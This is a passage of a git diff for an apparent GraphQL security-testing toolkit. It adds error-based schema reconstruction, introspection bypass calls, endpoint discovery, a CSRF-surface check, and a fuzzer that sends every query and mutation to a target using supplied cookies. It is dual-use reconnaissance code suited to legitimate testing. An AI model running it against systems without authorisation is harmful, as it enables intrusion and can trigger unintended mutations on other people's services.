Exception: + continue + + if not discovered: + if verbose: + print("[!] No fields discovered via error probing.") + return None + + if verbose: + print(f"[+] Discovered {len(discovered)} field(s): {sorted(discovered)}") + + # Technique 3 — probe each field for required args + field_defs: List[Dict[str, Any]] = [] + for fname in sorted(discovered): + args: List[Dict[str, Any]] = [] + ret_type: Dict[str, Any] = {"kind": "SCALAR", "name": "String", "ofType": None} + try: + resp = requests.post(url, headers=h, + json={"query": f"{{ {fname} }}"}, timeout=timeout) + for error in (resp.json().get("errors") or []): + msg = error.get("message", "") + for m in re.finditer( + r"[Aa]rgument\s+[\"']([^\"']+)[\"'][^.]*?type\s+[\"']([^\"']+)[\"']", msg + ): + args.append({ + "name": m.group(1), + "type": {"kind": "SCALAR", + "name": re.sub(r"[!\[\]]", "", m.group(2)), + "ofType": None}, + "defaultValue": None, + }) + if re.search(r"must have a selection", msg, re.I): + ret_type = {"kind": "OBJECT", "name": "Unknown", "ofType": None} + except Exception: + pass + field_defs.append({ + "name": fname, "description": None, "args": args, + "type": ret_type, "isDeprecated": False, "deprecationReason": None, + }) + + return {"data": {"__schema": { + "queryType": {"name": root_type_name}, + "mutationType": None, + "subscriptionType": None, + "types": [{ + "kind": "OBJECT", + "name": root_type_name, + "description": "Partially reconstructed via error-based probing", + "fields": field_defs, + "inputFields": None, + "interfaces": [], + "enumValues": None, + "possibleTypes": None, + }], + "directives": [], + }}} + + +# ── Endpoint discovery ─────────────────────────────────────────────────────── + +# Standard paths probed during auto-discovery, in priority order. +GRAPHQL_PATHS = [ + "/graphql", + "/api/graphql", + "/graphiql", + "/graphql/console", + "/api", + "/graphql/api", + "/graphql/graphql", + "/graphql.php", +] + + +def ping(url: str, headers: Dict[str, str], timeout: int = 10) -> Optional[str]: + """Send {__typename} and return the typename string, or None if not GraphQL.""" + if requests is None: + return None + h = {k: v for k, v in (headers or {}).items() if k.lower() != "content-type"} + try: + resp = requests.post(url, headers=h, json={"query": "{__typename}"}, timeout=timeout) + data = resp.json() + if isinstance(data, dict): + d = data.get("data") or data + if isinstance(d, dict): + return d.get("__typename") + except Exception: + pass + return None + + +def find_graphql_endpoint(base_url: str, headers: Dict[str, str], + timeout: int = 10) -> Optional[str]: + """Silently probe standard paths under base_url and return the first confirmed one.""" + parsed = urlparse(base_url) + base = urlunparse((parsed.scheme, parsed.netloc, "", "", "", "")) + for path in GRAPHQL_PATHS: + candidate = base + path + if ping(candidate, headers, timeout): + return candidate + return None + + +# ── Schema extraction ───────────────────────────────────────────────────────── + +def extract_schema(data: Dict[str, Any]) -> Optional[Dict[str, Any]]: + """Extract the __schema dict from either response shape. + + Handles both: + {"data": {"__schema": ...}} — standard GraphQL introspection response + {"__schema": ...} — some servers omit the data wrapper + """ + if not isinstance(data, dict): + return None + if isinstance(data.get("data"), dict): + return data["data"].get("__schema") + return data.get("__schema") diff --git a/core/output.py b/core/output.py new file mode 100644 index 0000000..f44cd87 --- /dev/null +++ b/core/output.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python3 +"""Shared colour utilities. + +Exports Fore/Style (colorama or dummy) for sqli_detector, and ANSI constants +for qgen/effuzz which don't depend on colorama. +""" +try: + from colorama import init as _colorama_init, Fore, Style + _colorama_init(autoreset=True) +except ImportError: + class _Dummy: + def __getattr__(self, name): + return "" + Fore = Style = _Dummy() + +# Plain ANSI constants used by qgen and effuzz +RED = "\033[31m" +GREEN = "\033[32m" +YELLOW = "\033[33m" +BLUE = "\033[34m" +CYAN = "\033[36m" +MAGENTA = "\033[35m" +GREY = "\033[90m" +BOLD = "\033[1m" +RESET = "\033[0m" diff --git a/effuzz/README.md b/effuzz/README.md deleted file mode 100644 index 692c7aa..0000000 --- a/effuzz/README.md +++ /dev/null @@ -1,62 +0,0 @@ -# Endpoint Fuzzer - -This script helps you check for methods you've got permissions in your GraphQL schema. - -```shell -███████╗███████╗███████╗██╗ ██╗███████╗███████╗ -██╔════╝██╔════╝██╔════╝██║ ██║╚══███╔╝╚══███╔╝ -█████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ -██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ -███████╗██║ ██║ ╚██████╔╝███████╗███████╗ -╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ -``` - -## Usage - ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`. - -- Basic command: - -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql -``` - -- If you have cookie and/or variables to anidate queries: - -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --cookie /path/to/cookie.txt --variables /path/to/variables.json -``` - -- Enable debug mode to check petitions and responses: - -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --debug -``` - -- Match exact reponse status codes: - -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --mc 200,403 -``` - -- Hide responses with matching status codes: - -```shell -python3 effuzz.py --introspection /path/to/introspection_schema.json --url https://example.com/graphql --fc 200,403 -``` - -## Available commands - -- You can use the following commands: - -```shell - --introspection Path to the introspection JSON file - --url GraphQL endpoint URL - -s | --silent Only show endpoints that DO NOT return 401 - --cookie File containing cookie in plain text (one line) - --variables JSON file with variables for the payload - --debug Show full request and response - --match-code | -mc Show only responses with matching status codes (e.g., 200,403,500) - --filter-code | -fc Hide responses with matching status codes (e.g., 401,404) -``` diff --git a/effuzz/__init__.py b/effuzz/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/effuzz/effuzz.py b/effuzz/effuzz.py index ee31dd1..faf7eb7 100644 --- a/effuzz/effuzz.py +++ b/effuzz/effuzz.py @@ -1,251 +1,368 @@ #!/usr/bin/env python3 +""" +effuzz.py — GraphQL endpoint fuzzer. + +Enumerates every query and mutation from the schema and sends a minimal request +for each, reporting HTTP status/size/words/lines (ffuf-style output). + +Extra modes: + --discover Probe common GraphQL paths and confirm with {__typename} + --check-methods Test GET and form-urlencoded support (CSRF surface assessment) +""" + import json -import requests -import argparse -import sys import os - -# ===================================================== -# COLORS -# ===================================================== -RED = "\033[91m" -YELLOW = "\033[93m" -MAGENTA = "\033[95m" -GREEN = "\033[92m" -CYAN = "\033[36m" -RESET = "\033[0m" - +import sys +import argparse +import textwrap +from datetime import datetime, timezone +from typing import Any, Dict, List, Optional, Tuple +from urllib.parse import urlparse, urlunparse, urlencode + +sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + +import requests + +import core.introspection as core_intro +from core.http import build_headers +from core.output import RED, GREEN, YELLOW, BLUE, RESET + + def print_banner(): - print(f""" -{YELLOW} -███████╗███████╗███████╗██╗ ██╗███████╗███████╗ -██╔════╝██╔════╝██╔════╝██║ ██║╚══███╔╝╚══███╔╝ -█████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ -██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ -███████╗██║ ██║ ╚██████╔╝███████╗███████╗ -╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ - v1.0 -{RESET} - -{CYAN}made by gitblanc — https://github.com/gitblanc/GraphQL-Scripts{RESET} - -""") - -# ===================================================== -# CLI ARGUMENTS -# ===================================================== -parser = argparse.ArgumentParser(description="Test GraphQL endpoints using introspection.") -parser.add_argument("--introspection", required=True, help="Path to the introspection JSON file") -parser.add_argument("--url", required=True, help="GraphQL endpoint URL") - -parser.add_argument("-s", "--silent", action="store_true", - help="Only show endpoints that DO NOT return 401") - -parser.add_argument("--cookie", help="File containing cookie in plain text (one line)") -parser.add_argument("--variables", help="JSON file with variables for the payload") -parser.add_argument("--debug", action="store_true", help="Show full request and response") -parser.add_argument("--match-code", "-mc", - help="Show only responses with matching status codes (e.g., 200,403,500)") -parser.add_argument("--filter-code", "-fc", - help="Hide responses with matching status codes (e.g., 401,404)") - -args = parser.parse_args() - -GRAPHQL_URL = args.url -INTROSPECTION_FILE = args.introspection - -# Parse match-code -match_codes = None -if args.match_code: - match_codes = set(int(x.strip()) for x in args.match_code.split(",") if x.strip().isdigit()) - -# Parse filter-code -filter_codes = None -if args.filter_code: - filter_codes = set(int(x.strip()) for x in args.filter_code.split(",") if x.strip().isdigit()) - -print_banner() - -# ===================================================== -# VALIDATE FILE -# ===================================================== -if not os.path.exists(INTROSPECTION_FILE): - print(f"❌ File not found: {INTROSPECTION_FILE}") - sys.exit(1) - -try: - with open(INTROSPECTION_FILE, "r") as f: - introspection_data = json.load(f) -except json.JSONDecodeError: - print("❌ The introspection file is NOT valid JSON.") - sys.exit(1) - -# ===================================================== -# LOAD COOKIE AND VARIABLES -# ===================================================== -cookie_value = None -if args.cookie: - if not os.path.exists(args.cookie): - print(f"❌ Cookie file not found: {args.cookie}") - sys.exit(1) - with open(args.cookie, "r") as f: - cookie_value = f.read().strip() - -variables_value = {} -if args.variables: - if not os.path.exists(args.variables): - print(f"❌ Variables file not found: {args.variables}") - sys.exit(1) - try: - with open(args.variables, "r") as f: - variables_value = json.load(f) - except: - print("❌ Variables file is NOT valid JSON.") - sys.exit(1) - -# ===================================================== -# EXTRACT QUERIES / MUTATIONS FROM THE SCHEMA -# ===================================================== -if "data" not in introspection_data: - print("❌ JSON does not contain 'data' key. Not valid introspection.") - sys.exit(1) - -schema = introspection_data["data"].get("__schema", {}) -types = schema.get("types", []) - -def get_fields(type_name): - for t in types: - if t.get("name") == type_name: - return [f["name"] for f in t.get("fields", [])] - return [] - -query_type_name = schema.get("queryType", {}).get("name") -mutation_type_name = schema.get("mutationType", {}).get("name") - -queries = get_fields(query_type_name) if query_type_name else [] -mutations = get_fields(mutation_type_name) if mutation_type_name else [] - -print(f"[✓] Introspection loaded ({len(queries)} queries, {len(mutations)} mutations)") -print("------------------------------------------------------------") - -# ===================================================== -# HEADERS (With or without authentication) -# ===================================================== -HEADERS = { - "Content-Type": "application/json" -} - -if cookie_value: - HEADERS["Cookie"] = cookie_value - -# ===================================================== -# FFUF-LIKE PROCESSING -# ===================================================== -def response_stats(resp): - text = resp.text - size = len(text) - words = len(text.split()) - lines = text.count("\n") + 1 - return size, words, lines - -def color_status(code, resp): - """Assign a color according to the real response type.""" - + print(textwrap.dedent(f""" + {YELLOW} + ███████╗███████╗███████╗██╗ ██╗███████╗███████╗ + ██╔════╝██╔════╝██╔════╝██║ ██║╚══███╔╝╚══███╔╝ + █████╗ █████╗ █████╗ ██║ ██║ ███╔╝ ███╔╝ + ██╔══╝ ██╔══╝ ██╔══╝ ██║ ██║ ███╔╝ ███╔╝ + ███████╗██║ ██║ ╚██████╔╝███████╗███████╗ + ╚══════╝╚═╝ ╚═╝ ╚═════╝╚══════╝╚══════╝ v1.1 + {RESET}""")) + + +def response_stats(resp: requests.Response) -> Tuple[int, int, int]: + text = resp.text or "" + return len(text), len(text.split()), text.count("\n") + 1 + + +def color_status(code: int, resp: requests.Response) -> str: if code == 200: try: - data = resp.json() - if "errors" not in data: + if "errors" not in resp.json(): return f"{GREEN}{code}{RESET}" - except: + except Exception: pass return f"{YELLOW}{code}{RESET}" - if code in (401, 403) or "Method forbidden" in resp.text: return f"{RED}{code}{RESET}" - if code in (400, 500): return f"{YELLOW}{code}{RESET}" - return str(code) - - -def test_endpoint(name, is_mutation=False): - - if is_mutation: - gql = f"mutation {name} {{ {name} }}" + + +def build_minimal_query(method_name: str, is_mutation: bool = False) -> str: + """Build the simplest possible query for a field to gauge accessibility.""" + op = "mutation" if is_mutation else "query" + return f"{op} {{ {method_name} }}" + + +def perform_request(url: str, headers: Dict[str, str], payload: Dict[str, Any], + timeout: int = 15) -> Optional[requests.Response]: + try: + return requests.post(url, headers=headers, json=payload, timeout=timeout) + except requests.exceptions.RequestException as e: + print(f"[!] Request error for {url}: {e}", file=sys.stderr) + return None + + +# --------------------------------------------------------------------------- # +# --discover mode # +# --------------------------------------------------------------------------- # + +def discover_endpoint(base_url: str, headers: Dict[str, str], + timeout: int = 10) -> Optional[str]: + """Probe standard GraphQL paths and return the first confirmed endpoint URL.""" + parsed = urlparse(base_url) + base = urlunparse((parsed.scheme, parsed.netloc, "", "", "", "")) + + print(f"[*] Discovering GraphQL endpoint under {base}") + print(f"{'Path':<35} {'Confirmed'}") + print("-" * 55) + + confirmed_url = None + for path in core_intro.GRAPHQL_PATHS: + candidate = base + path + typename = core_intro.ping(candidate, headers, timeout) + if typename: + tag = f"{GREEN}YES — __typename: {typename}{RESET}" + if confirmed_url is None: + confirmed_url = candidate + else: + tag = "no" + print(f"{path:<35} {tag}") + + print() + if confirmed_url: + print(f"[+] Using confirmed endpoint: {confirmed_url}\n") else: - gql = f"query {name} {{ {name} }}" - - body = { - "operationName": name, - "variables": variables_value, - "query": gql - } - + print(f"{RED}[!] No GraphQL endpoint found under {base}{RESET}\n") + return confirmed_url + + +# --------------------------------------------------------------------------- # +# --check-methods mode (CSRF surface) # +# --------------------------------------------------------------------------- # + +def check_csrf_surface(url: str, headers: Dict[str, str], timeout: int = 10) -> None: + """Test whether the endpoint accepts GET queries and form-urlencoded POSTs. + + Both request types bypass CORS preflight and are exploitable for CSRF if the + endpoint accepts them and relies solely on session cookies for auth. + """ + print("[*] CSRF surface check:") + no_ct_headers = {k: v for k, v in headers.items() if k.lower() != "content-type"} + + # 1. GET with ?query=... try: - if args.debug: - print("\n====================== REQUEST ======================") - print("→ Endpoint:", GRAPHQL_URL) - print("→ Headers:", json.dumps(HEADERS, indent=2)) - print("→ Sent body:") - print(json.dumps(body, indent=2)) - resp = requests.post(GRAPHQL_URL, headers=HEADERS, json=body) - if args.debug: - print("\n====================== RESPONSE =====================") - print("← HTTP Status:", resp.status_code) + get_url = url + "?" + urlencode({"query": "{__typename}"}) + resp = requests.get(get_url, headers=no_ct_headers, timeout=timeout) + typename = None + try: + data = resp.json() + if isinstance(data, dict): + d = data.get("data") or data + if isinstance(d, dict): + typename = d.get("__typename") + except Exception: + pass + if typename: + status = f"{GREEN}ACCEPTS{RESET} ← CSRF possible if no token validation" + elif resp.status_code == 200: + status = f"{YELLOW}responded{RESET} (no __typename, may be partial)" + else: + status = f"rejected (HTTP {resp.status_code})" + print(f" GET ?query={{...}} {status}") + except Exception as e: + print(f" GET ?query={{...}} error: {e}") + + # 2. POST with application/x-www-form-urlencoded + try: + form_headers = dict(no_ct_headers) + form_headers["Content-Type"] = "application/x-www-form-urlencoded" + body = urlencode({"query": "{__typename}"}) + resp = requests.post(url, headers=form_headers, data=body, timeout=timeout) + typename = None + try: + data = resp.json() + if isinstance(data, dict): + d = data.get("data") or data + if isinstance(d, dict): + typename = d.get("__typename") + except Exception: + pass + if typename: + status = f"{GREEN}ACCEPTS{RESET} ← CSRF possible (no CORS preflight on form POST)" + elif resp.status_code == 200: + status = f"{YELLOW}responded{RESET} (no __typename, may be partial)" + else: + status = f"rejected (HTTP {resp.status_code})" + print(f" POST form-urlencoded {status}") + except Exception as e: + print(f" POST form-urlencoded error: {e}") + + print() + + +# --------------------------------------------------------------------------- # +# Core fuzzing loop # +# --------------------------------------------------------------------------- # + +def fuzz_fields(url: str, headers: Dict[str, str], + fields: List[str], label: str, + variables_value: Dict[str, Any], + is_mutation: bool, + match_codes: Optional[set], + filter_codes: Optional[set], + silent: bool, + debug: bool) -> None: + if not fields: + print(f"[*] No {label} found in schema.") + return + + print(f"\n[*] Fuzzing {label} ({len(fields)}):") + print(f"{'Method':<35} {'Type':<10} Status Size Words Lines") + print("-" * 80) + + for name in fields: + query_str = build_minimal_query(name, is_mutation) + payload: Dict[str, Any] = {"query": query_str} + if variables_value: + payload["variables"] = variables_value + + resp = perform_request(url, headers, payload) + if resp is None: + print(f"{name:<35} {'mutation' if is_mutation else 'query':<10} {RED}request failed{RESET}") + continue + + code = resp.status_code + size, words, lines = response_stats(resp) + colored = color_status(code, resp) + + if match_codes and code not in match_codes: + continue + if filter_codes and code in filter_codes: + continue + if silent and code == 401: + continue + + op_label = "mutation" if is_mutation else "query" + print(f"{name:<35} {op_label:<10} [Status: {colored}] " + f"[Size: {size}] [Words: {words}] [Lines: {lines}]") + + if debug: try: - print(json.dumps(resp.json(), indent=2)) - except: + print(json.dumps(resp.json(), indent=2, ensure_ascii=False)) + except Exception: print(resp.text) - print("=====================================================\n") - except Exception: - return None - - size, words, lines = response_stats(resp) - status_colored = color_status(resp.status_code, resp) - - return { - "status": status_colored, - "status_raw": resp.status_code, - "size": size, - "words": words, - "lines": lines, - } - -# ===================================================== -# FFUF-LIKE OUTPUT -# ===================================================== -def print_result(name, r): - if r is None: - return - - status_raw = r["status_raw"] - - if args.silent and status_raw == 401: - return - - if match_codes is not None and status_raw not in match_codes: - return - - if filter_codes is not None and status_raw in filter_codes: - return - - print( - f"{CYAN}{name}{RESET} " - f"[Status: {r['status']}] " - f"[Size: {r['size']}] " - f"[Words: {r['words']}] " - f"[Lines: {r['lines']}] " + + print("-" * 80) + + +# --------------------------------------------------------------------------- # +# main # +# --------------------------------------------------------------------------- # + +def main(): + print_banner() + + parser = argparse.ArgumentParser( + description="GraphQL endpoint fuzzer — enumerates operations and checks accessibility", + formatter_class=argparse.RawDescriptionHelpFormatter, ) - -# ========================= QUERIES ========================== -for q in queries: - res = test_endpoint(q) - print_result(q, res) - -# ========================= MUTATIONS ========================== -for m in mutations: - res = test_endpoint(m, is_mutation=True) - print_result(m, res) - -print("\n[✓] Test completed.\n") + parser.add_argument("--url", required=True, metavar="URL", + help="GraphQL endpoint URL (auto-discovery runs if it doesn't respond as GraphQL)") + parser.add_argument("--check-methods", action="store_true", + help="Test GET and form-urlencoded support (CSRF surface)") + parser.add_argument("-s", "--silent", action="store_true", + help="Hide 401 responses") + parser.add_argument("--cookie", metavar="FILE", + help="Cookie file (one line)") + parser.add_argument("--variables", metavar="FILE", + help="JSON file with variables to include in each request") + parser.add_argument("--debug", action="store_true", + help="Print full response body for each request") + parser.add_argument("--match-code", "-mc", metavar="CODES", + help="Show only these status codes, comma-separated (e.g. 200,400)") + parser.add_argument("--filter-code", "-fc", metavar="CODES", + help="Hide these status codes, comma-separated (e.g. 401,404)") + parser.add_argument("-H", "--header", action="append", default=[], + metavar="Name: Value", + help="HTTP header (repeatable)") + args = parser.parse_args() + + # --- Build headers --- + if args.cookie and not os.path.isfile(args.cookie): + print(f"[!] Cookie file not found: {args.cookie!r}", file=sys.stderr) + sys.exit(1) + headers = build_headers(args.header, args.cookie) + + # --- Parse code filters --- + def _parse_codes(raw: Optional[str]) -> Optional[set]: + if not raw: + return None + result = set() + for tok in raw.split(","): + tok = tok.strip() + if not tok.isdigit(): + print(f"[!] Invalid status code in filter: {tok!r}", file=sys.stderr) + sys.exit(1) + result.add(int(tok)) + return result + + match_codes = _parse_codes(args.match_code) + filter_codes = _parse_codes(args.filter_code) + + # --- Load variables --- + variables_value: Dict[str, Any] = {} + if args.variables: + if not os.path.isfile(args.variables): + print(f"[!] Variables file not found: {args.variables!r}", file=sys.stderr) + sys.exit(1) + try: + with open(args.variables, "r", encoding="utf-8") as f: + variables_value = json.load(f) + except (ValueError, OSError) as e: + print(f"[!] Variables file is not valid JSON: {e}", file=sys.stderr) + sys.exit(1) + + # ------------------------------------------------------------------ # + # Resolve GraphQL endpoint (auto-discover if URL isn't GraphQL) # + # ------------------------------------------------------------------ # + graphql_url = args.url + if core_intro.ping(graphql_url, headers) is None: + print(f"[!] {graphql_url} did not respond as a GraphQL endpoint — running auto-discovery...") + confirmed = discover_endpoint(graphql_url, headers) + if confirmed is None: + print(f"{RED}[!] No GraphQL endpoint found. Aborting.{RESET}", file=sys.stderr) + sys.exit(1) + graphql_url = confirmed + + # ------------------------------------------------------------------ # + # --check-methods: CSRF surface # + # ------------------------------------------------------------------ # + if args.check_methods: + check_csrf_surface(graphql_url, headers) + + # ------------------------------------------------------------------ # + # Fetch introspection # + # ------------------------------------------------------------------ # + print(f"[*] Fetching introspection from {graphql_url} ...") + introspection_data, strategy = core_intro.fetch_with_bypass(graphql_url, headers) + if introspection_data is None: + print("[!] All introspection strategies failed — attempting error-based reconstruction...") + introspection_data = core_intro.reconstruct_schema_from_errors(graphql_url, headers) + if introspection_data is None: + print("[!] Could not obtain schema.", file=sys.stderr) + sys.exit(1) + strategy = "error-reconstruction" + tag = f" (strategy: {strategy})" if strategy and strategy != "normal" else "" + print(f"[+] Introspection obtained{tag}.") + + schema = core_intro.extract_schema(introspection_data) + if not schema: + print("[!] '__schema' not found in introspection.", file=sys.stderr) + sys.exit(1) + + types = schema.get("types") or [] + + def _get_fields(type_name: Optional[str]) -> List[str]: + if not type_name: + return [] + for t in types: + if t.get("name") == type_name: + return [f["name"] for f in (t.get("fields") or [])] + return [] + + queries = _get_fields((schema.get("queryType") or {}).get("name")) + mutations = _get_fields((schema.get("mutationType") or {}).get("name")) + + ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + print(f"\n[+] Schema: {len(queries)} queries, {len(mutations)} mutations") + print(f"[*] Target: {graphql_url} | {ts}") + + # ------------------------------------------------------------------ # + # Fuzz # + # ------------------------------------------------------------------ # + fuzz_fields(graphql_url, headers, queries, "queries", + variables_value, False, + match_codes, filter_codes, args.silent, args.debug) + + fuzz_fields(graphql_url, headers, mutations, "mutations", + variables_value, True, + match_codes, filter_codes, args.silent, args.debug) + + print("\n[*] effuzz done.") + + +if __name__ == "__main__": + main() diff --git a/qGen/README.md b/qGen/README.md deleted file mode 100644 index bae69d8..0000000 --- a/qGen/README.md +++ /dev/null @@ -1,88 +0,0 @@ -# Query Generator - -This script helps you to generate sample queries for enormous GraphQL endpoints. - -```shell - ██████╗ ██████╗ ███████╗███╗ ██╗ -██╔═══██╗██╔════╝ ██╔════╝████╗ ██║ -██║ ██║██║ ███╗█████╗ ██╔██╗ ██║ -██║▄▄ ██║██║ ██║██╔══╝ ██║╚██╗██║ -╚██████╔╝╚██████╔╝███████╗██║ ╚████║ - ╚══▀▀═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ -``` - -## Usage - ->[!Important] ->You must have previously obtained the result of an introspection query and save it to a json file like `introspection_schema.json`. - -- You must execute the script like this: - -```shell -python3 qGen.py --introspection /path/to/introspection_schema.json -``` - -- Then you'll be prompted with an interactive terminal: - -```shell -qGen $ -``` - -### Option 1 - -- You can list all methods and mutations available in your schema and select the one you are interested in: - -```shell -# ------Listing methods and selecting one------ -qGen $ listMethods - -[redacted] -[1] findAllUsers -[2] findAllPasswords -[3] findAllConfigFiles - -qGen $ use 1 -qGen $ genQuery -``` - -### Option 2 - -- Directly use one method you know by name: - -```shell -# ------Directly select one method------ -qGen $ use findAllConfigFiles -qGen $ genQuery -``` - -### Option 3 - -- Search for specific methods according to a grep pipe: - -```shell -# ------Search for alike methods------ -qGen $ listMethods | grep Id - -[redacted] -[11] findAllUsersById -[34] findAllPasswordsByUserId -[89] findAllConfigFilesByContractId - -qGen $ use 89 -qGen $ genQuery -``` - -## Available commands - -- You can use the following commands: - -```shell - help - Show the help message - listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields - exit - Exit the application -``` - - - diff --git a/qGen/qGen.py b/qGen/qGen.py deleted file mode 100644 index 42266e5..0000000 --- a/qGen/qGen.py +++ /dev/null @@ -1,299 +0,0 @@ -import json -import os -import sys -import argparse - -# ANSI COLORS -RED = "\033[31m" -GREY = "\033[90m" -BLUE = "\033[34m" -YELLOW = "\033[33m" -CYAN = "\033[36m" -RESET = "\033[0m" - -def print_banner(): - print(f""" -{YELLOW} - ██████╗ ██████╗ ███████╗███╗ ██╗ -██╔═══██╗██╔════╝ ██╔════╝████╗ ██║ -██║ ██║██║ ███╗█████╗ ██╔██╗ ██║ -██║▄▄ ██║██║ ██║██╔══╝ ██║╚██╗██║ -╚██████╔╝╚██████╔╝███████╗██║ ╚████║ - ╚══▀▀═╝ ╚═════╝ ╚══════╝╚═╝ ╚═══╝ v1.0 -{RESET} - -{CYAN}made by gitblanc — https://github.com/gitblanc/QGen{RESET} - -""") - -def load_introspection(): - while True: - path = input("Enter introspection JSON file path: ").strip() - - if not os.path.exists(path): - print("❌ File not found. Try again.\n") - continue - - try: - with open(path, "r", encoding="utf-8") as f: - data = json.load(f) - print("✅ Introspection successfully loaded.\n") - return data - except Exception as e: - print(f"❌ Error reading JSON: {e}\n") - - -# Extract query fields -def extract_graphql_queries(introspection): - try: - types = introspection["data"]["__schema"]["types"] - except Exception: - return [] - - query_type_name = introspection["data"]["__schema"]["queryType"]["name"] - query_type = next((t for t in types if t.get("name") == query_type_name), None) - - if not query_type: - return [] - - return query_type.get("fields", []) - - -# Follow NON_NULL / LIST / etc. -def resolve_type(t): - while t.get("ofType") is not None: - t = t["ofType"] - return t - - -# Recursively build full field tree for the query -def build_field_tree(field_type, types, depth=0, visited=None): - if visited is None: - visited = set() - - field_type = resolve_type(field_type) - - if field_type["name"] in visited: - return "" - - visited.add(field_type["name"]) - - if field_type["kind"] != "OBJECT": - return "" - - obj = next((t for t in types if t["name"] == field_type["name"]), None) - if not obj or "fields" not in obj: - return "" - - indent = " " * depth - result = "" - - for f in obj["fields"]: - f_type = resolve_type(f["type"]) - f_name = f["name"] - - if f_type["kind"] == "OBJECT": - sub = build_field_tree(f["type"], types, depth + 1, visited.copy()) - result += f"{indent}{f_name} {{\n{sub}{indent}}}\n" - else: - result += f"{indent}{f_name}\n" - - return result - -def save_query_to_file(method_name, query_text): - # Ensure directory exists - os.makedirs("queries", exist_ok=True) - - path = f"queries/{method_name}.txt" - - try: - with open(path, "w", encoding="utf-8") as f: - f.write(query_text) - print(f"📁 Query saved to: {path}\n") - except Exception as e: - print(f"❌ Error saving query: {e}") - - -def stringify_type(t): - """Convert GraphQL type tree into a printable type string.""" - if t["kind"] == "NON_NULL": - return f"{stringify_type(t['ofType'])}!" - elif t["kind"] == "LIST": - return f"[{stringify_type(t['ofType'])}]" - else: - return t["name"] - -def generate_full_query(method_field, introspection): - types = introspection["data"]["__schema"]["types"] - - # ---- Extract arguments ---- - args = method_field.get("args", []) - variables = [] - call_args = [] - - for a in args: - var_name = a["name"] - var_type = stringify_type(a["type"]) - variables.append(f"${var_name}: {var_type}") - call_args.append(f"{var_name}: ${var_name}") - - # Build signature - variables_str = f"({', '.join(variables)})" if variables else "" - call_args_str = f"({', '.join(call_args)})" if call_args else "" - - # ---- Build field tree ---- - root_type = method_field["type"] - fields_tree = build_field_tree(root_type, types, depth=2) - - # ---- Build final query ---- - return f""" -query {method_field['name']}{variables_str} {{ - {method_field['name']}{call_args_str} {{ -{fields_tree} - }} -}} -""".rstrip() - - -def print_help(): - print(""" -Available commands: - help - Show this help message - listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields - exit - Exit the application -""") - - -def interactive_console(methods, introspection): - selected_method = None - - print("Type 'help' to see available commands.\n") - - while True: - raw_cmd = input(f"{RED}Qgen ${RESET} ").strip() - - # --- PIPE SUPPORT --- - if "|" in raw_cmd: - left, _, right = raw_cmd.partition("|") - cmd = left.strip() - pipe_cmd = right.strip() - - if pipe_cmd.startswith("grep"): - _, _, grep_text = pipe_cmd.partition("grep") - grep_text = grep_text.strip().lower() - else: - print("❌ Unsupported pipe command.\n") - continue - else: - cmd = raw_cmd - pipe_cmd = None - # --------------------- - - # MAIN COMMAND HANDLING - if cmd == "help": - output = """Available commands: - help - Show this help message - listMethods - List all available GraphQL methods - use - Select a method - genQuery - Generate a full GraphQL query with all fields - exit - Exit the application -""" - if pipe_cmd: - output = "\n".join( - line for line in output.splitlines() if grep_text in line.lower() - ) - print(output) - - elif cmd == "listMethods": - lines = [f" [{i}] {m['name']}" for i, m in enumerate(methods, start=1)] - - if pipe_cmd: - lines = [l for l in lines if grep_text in l.lower()] - - print("\n📌 Available methods:") - for line in lines: - print(line) - print() - - elif cmd.startswith("use "): - _, _, value = cmd.partition(" ") - value = value.strip() - - if value.isdigit(): - idx = int(value) - 1 - if 0 <= idx < len(methods): - selected_method = methods[idx] - print(f"✔ Selected method: {selected_method['name']}\n") - else: - print("❌ Invalid method number.\n") - else: - match = next((m for m in methods if m["name"] == value), None) - if match: - selected_method = match - print(f"✔ Selected method: {value}\n") - else: - print("❌ Method not found.\n") - - elif cmd == "genQuery": - if not selected_method: - print("❌ Select a method first with: use \n") - else: - query = generate_full_query(selected_method, introspection) - print("\n----------------------------------------") - print(f"{BLUE}{query}{RESET}") - print("----------------------------------------\n") - - # Save the query automatically - save_query_to_file(selected_method["name"], query) - - elif cmd == "exit": - print("👋 Exiting...") - break - - else: - print("❌ Unknown command. Type 'help' for the command list.\n") - - -def main(): - print_banner() - print("=== GraphQL Interactive CLI (extruder) ===\n") - - parser = argparse.ArgumentParser(description="GraphQL Introspection CLI Extruder") - parser.add_argument( - "--introspection", - type=str, - help="Path to introspection JSON file" - ) - - args = parser.parse_args() - - # If provided via CLI, try to load it directly - if args.introspection: - if os.path.exists(args.introspection): - try: - with open(args.introspection, "r", encoding="utf-8") as f: - introspection = json.load(f) - print("✅ Introspection successfully loaded from CLI argument.\n") - except Exception as e: - print(f"❌ Error reading JSON: {e}\n") - return - else: - print("❌ File path passed to --introspection does not exist.\n") - return - else: - # Fall back to interactive prompt - introspection = load_introspection() - - methods = extract_graphql_queries(introspection) - - if not methods: - print("❌ No GraphQL methods found in the introspection.") - return - - interactive_console(methods, introspection) - - -if __name__ == "__main__": - main() diff --git a/qgen/__init__.py b/qgen/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/qgen/qgen.py b/qgen/qgen.py new file mode 100644 index 0000000..db5d1e0 --- /dev/null +++ b/qgen/qgen.py @@ -0,0 +1,387 @@ +#!/usr/bin/env python3 +import json +import os +import 